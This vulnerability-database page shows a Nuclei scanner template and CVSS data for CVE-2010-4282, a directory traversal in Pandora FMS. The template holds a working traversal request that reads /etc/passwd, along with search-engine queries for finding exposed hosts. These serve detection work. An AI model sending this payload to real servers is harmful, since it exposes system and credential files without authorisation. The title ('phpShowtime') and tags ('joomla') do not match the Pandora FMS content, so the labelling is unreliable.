Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-4282
HistorySep 27, 2021 - 11:02 a.m.

phpShowtime 2.0 - Directory Traversal

2021-09-2711:02:48
ProjectDiscovery
github.com
6
cve
seclists
phpshowtime
pandora_fms
exploit-db
local file inclusion

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

Low

EPSS

0.008

Percentile

82.2%

Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.

id: CVE-2010-4282

info:
  name: phpShowtime 2.0 - Directory Traversal
  author: daffainfo
  severity: high
  description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15643
    - https://nvd.nist.gov/vuln/detail/CVE-2010-4282
    - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
    - http://www.exploit-db.com/exploits/15643
    - http://seclists.org/fulldisclosure/2010/Nov/326
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-4282
    cwe-id: CWE-22
    epss-score: 0.01214
    epss-percentile: 0.83767
    cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica

http:
  - method: GET
    path:
      - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022028440e6744ab15a712bbddd9e67effbb10196178d3709600c03cdd2e30ade50a02205d3555b2f4623199a271f2977587e15566212b551f0fcf96b961652ce2954fdc:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

Low

EPSS

0.008

Percentile

82.2%